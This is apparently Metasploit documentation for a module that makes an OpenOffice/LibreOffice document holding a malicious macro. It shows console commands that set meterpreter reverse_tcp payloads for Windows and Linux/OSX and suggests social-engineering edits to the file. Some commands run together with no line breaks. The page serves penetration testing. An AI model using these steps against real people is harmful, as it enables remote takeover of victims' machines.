documentation/modules/exploit/multi/misc/openoffice_document_macro.md
This module generates an Apache OpenOffice Text Document with a malicious macro in it. It also works against LibreOffice.
To exploit successfully, the targeted user must adjust the security level in Macro Security to either Medium or Low. If set to Medium, a prompt is presented to the user to enable or disable the macro. If set to Low, the macro can automatically run without any warning.
To use this exploit, you must know the platform of the targeted user. The module supports Windows, Linux, and OSX. If the target is using Windows, then the exploit will generate the macro with malicious Powershell code inside. For other supported platforms, the exploit will generate Python code.
An example of using this module against Windows:
use exploit/multi/misc/openoffice_document_macroset target 0set payload windows/meterpreter/reverse_tcpexploitAn example of using this module against Linux or OSX:
use exploit/multi/misc/openoffice_document_macroset target 1set payload python/meterpreter/reverse_tcpexploitOnce started, the module will mainly do these things:
This option can be used to insert text to the malicious document.
Since social engineering will play a big part in the success of the attack, you will most likely want to modify the odt file.